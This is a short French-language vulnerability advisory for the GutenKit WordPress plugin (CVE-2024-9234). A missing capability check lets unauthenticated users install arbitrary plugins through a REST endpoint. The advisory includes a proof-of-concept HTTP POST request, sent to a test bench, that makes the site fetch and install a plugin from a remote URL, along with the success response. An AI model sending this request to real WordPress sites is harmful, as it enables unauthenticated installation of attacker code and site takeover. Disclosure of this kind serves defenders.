
GutenKit <= 2.1.0 - Téléchargement de fichier arbitraire non authentifié
GutenKit <= 2.1.0 - Téléchargement de fichier arbitraire non authentifié
Le plugin GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor pour WordPress est vulnérable aux téléchargements de fichiers arbitraires en raison d'un manque de vérification des capacités dans la fonction install_and_activate_plugin_from_external() (point de terminaison REST API install-active-plugin) dans toutes les versions jusqu'à la version 2.1.0 incluse. Cela permet à des attaquants non authentifiés d'installer et d'activer des plugins arbitraires, ou d'utiliser la fonctionnalité pour télécharger des fichiers arbitraires déguisés en plugins.
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
Lien de téléchargement : Télécharger gutenkit-blocks-addon Version 2.1.0
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
{"success":true,"data":"Plugin installed successfully!"}